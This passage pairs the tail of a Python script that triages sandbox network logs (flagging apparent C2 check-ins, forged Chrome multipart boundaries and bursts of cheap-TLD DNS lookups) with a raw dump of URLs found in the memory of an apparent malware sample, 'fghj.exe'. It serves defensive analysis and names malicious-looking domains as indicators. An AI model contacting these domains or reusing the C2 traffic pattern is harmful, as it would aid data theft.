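    "Source: global traffic | DNS traffic detected: DNS query: spellshagey.biz",
    "Source: global traffic | DNS traffic detected: DNS query: immureprech.biz",
    "Source: global traffic | DNS traffic detected: DNS query: effecterectz.xyz",
    "Source: global traffic | DNS traffic detected: DNS query: wrathful-jammy.cyou",
    "Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1",
]

REQ_RE = re.compile(r"HTTP traffic detected: (\w+) (\S+) HTTP/1\.[01]")
DNS_RE = re.compile(r"^DNS traffic detected: DNS query: ([\w.-]+)$")
# Chrome (Blink) emits "----WebKitFormBoundary" plus 16 alphanumerics; a request
# carrying a Chrome User-Agent with any other boundary was not sent by Chrome.
CHROME_BOUNDARY_RE = re.compile(r"^----WebKitFormBoundary[A-Za-z0-9]{16}$")

def parse_line(line):
    """Split one observation into (source, event, {header name: value})."""
    fields = [f.strip() for f in line.split(" | ")]
    headers = {}
    for field in fields[2:]:
        name, _, value = field.partition(": ")
        headers[name.lower()] = value
    return fields[0].split(": ", 1)[1], fields[1], headers

def parse_requests(lines):
    """HTTP requests as dicts in report order; other lines are skipped."""
    reqs = []
    for line in lines:
        _, event, h = parse_line(line)
        m = REQ_RE.match(event)
        if not m:
            continue
        ctype = h.get("content-type", "")
        bm = re.search(r"boundary=(\S+)", ctype)
        reqs.append({"method": m.group(1), "path": m.group(2), "host": h.get("host", ""),
                     "ua": h.get("user-agent", ""), "ctype": ctype.split(";")[0],
                     "boundary": bm.group(1) if bm else None,
                     "length": int(h.get("content-length", 0))})
    return reqs

def dns_queries(lines):
    hits = [DNS_RE.match(parse_line(l)[1]) for l in lines]
    return [m.group(1) for m in hits if m]

def find_c2_candidates(reqs, max_checkin=16):
    """Hosts receiving a tiny form-urlencoded POST (check-in) plus multipart POSTs
    (uploads) on a single path. max_checkin is assumed, sized to the 8-byte first POST."""
    by_host = defaultdict(list)
    for r in reqs:
        if r["method"] == "POST":
            by_host[r["host"]].append(r)
    hits = {}
    for host, posts in by_host.items():
        checkin = any(p["ctype"] == "application/x-www-form-urlencoded"
                      and p["length"] <= max_checkin for p in posts)
        uploads = [p for p in posts if p["ctype"] == "multipart/form-data"]
        if checkin and uploads and len({p["path"] for p in posts}) == 1:
            hits[host] = {"path": posts[0]["path"], "uploads": len(uploads),
                          "bytes_uploaded": sum(p["length"] for p in uploads)}
    return hits

def boundary_mismatches(reqs):
    """Multipart boundaries that contradict the Chrome User-Agent they travel with."""
    return [r["boundary"] for r in reqs if r["boundary"] and "Chrome/" in r["ua"]
            and not CHROME_BOUNDARY_RE.match(r["boundary"])]

def dns_burst(names, tlds=("biz", "xyz", "cyou"), min_count=3):
    """Lookups across cheap TLDs; the TLD list and the count are assumptions."""
    hits = [n for n in names if n.rsplit(".", 1)[-1] in tlds]
    return hits if len(hits) >= min_count else []

def triage(lines):
    """Run every check and collect the names worth blocking or hunting for."""
    reqs, names = parse_requests(lines), dns_queries(lines)
    c2 = find_c2_candidates(reqs)
    # Assumption: a Steam profile GET ahead of the C2 POSTs is surfaced as a
    # possible dead-drop lookup for the analyst to confirm, not as a verdict.
    profile = any(r["host"] == "steamcommunity.com" and r["path"].startswith("/profiles/")
                  for r in reqs)
    return {"c2": c2, "bad_boundaries": boundary_mismatches(reqs),
            "dns_burst": dns_burst(names), "profile_fetch_before_c2": profile and bool(c2),
            "iocs": sorted(set(c2) | set(dns_burst(names)))}
```

Run `triage(SAMPLE)` to get the findings as a dict; the `iocs` list is what goes to a blocklist, while `bad_boundaries` is the check worth carrying into network detection, because a real Chrome/119 client never emits a bare uppercase boundary like the ones seen here.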
Source: fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:27060
Source: fghj.exe, 00000000.00000003.1564152101.00000000039F6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: fghj.exe, 00000000.00000003.1564152101.00000000039F6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: fghj.exe | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: fghj.exe, 00000000.00000003.1550688295.0000000000D32000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D35000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D32000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000002.1614043108.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D32000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1613112719.0000000000D3B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522479649.0000000000D3A000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D3A000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512826189.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D35000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D33000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: fghj.exe, 00000000.00000003.1564152101.00000000039F6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: fghj.exe | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVE36.crl0
Source: fghj.exe | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootE46.crl0
Source: fghj.exe | String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
Source: fghj.exe | String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
Source: fghj.exe, 00000000.00000003.1564152101.00000000039F6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: fghj.exe, 00000000.00000003.1564152101.00000000039F6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: fghj.exe, 00000000.00000003.1564152101.00000000039F6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: fghj.exe, 00000000.00000003.1564152101.00000000039F6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: fghj.exe | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVE36.crt0#
Source: fghj.exe | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootE46.p7c0#
Source: fghj.exe | String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
Source: fghj.exe | String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
Source: fghj.exe | String found in binary or memory: http://fpdownload.macromedia.com/get/flashplayer/update/current/install/install_all_win_
Source: fghj.exe | String found in binary or memory: http://fpdownload.macromedia.com/get/flashplayer/update/current/install/install_all_win_.dir
Source: fghj.exe | String found in binary or memory: http://ocsp.comodoca.com0
Source: fghj.exe, 00000000.00000003.1564152101.00000000039F6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: fghj.exe, 00000000.00000003.1564152101.00000000039F6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: fghj.exe | String found in binary or memory: http://ocsp.sectigo.com0
Source: fghj.exe | String found in binary or memory: http://ocsp.sectigo.com0&
Source: fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: fghj.exe, 00000000.00000003.1522741143.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: fghj.exe, 00000000.00000003.1522741143.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: fghj.exe, 00000000.00000003.1564152101.00000000039F6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: fghj.exe, 00000000.00000003.1564152101.00000000039F6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: fghj.exe, 00000000.00000003.1535169727.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1536020575.00000000039F6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.steampowered.com/
Source: fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: fghj.exe, 00000000.00000003.1535169727.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1536020575.00000000039F6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: fghj.exe, 00000000.00000003.1535169727.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1536020575.00000000039F6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: fghj.exe, 00000000.00000003.1535169727.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1536020575.00000000039F6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://checkout.steampowered.com/
Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steams
Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.cohK
Source: fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/
Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/publi0V
Source: fghj.exe, 00000000.00000003.1522741143.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=SCXpgixTDzt4&a
Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer201
Source: fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp
Source: fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
Source: fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
Source: fghj.exe, 00000000.00000003.1522741143.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: fghj.exe, 00000000.00000003.1522741143.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: fghj.exe, 00000000.00000003.1522741143.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: fghj.exe, 00000000.00000003.1522741143.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=M_FULq_A
Source: fghj.exe, 00000000.00000003.1522741143.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=aep8
Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLW
Source: fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
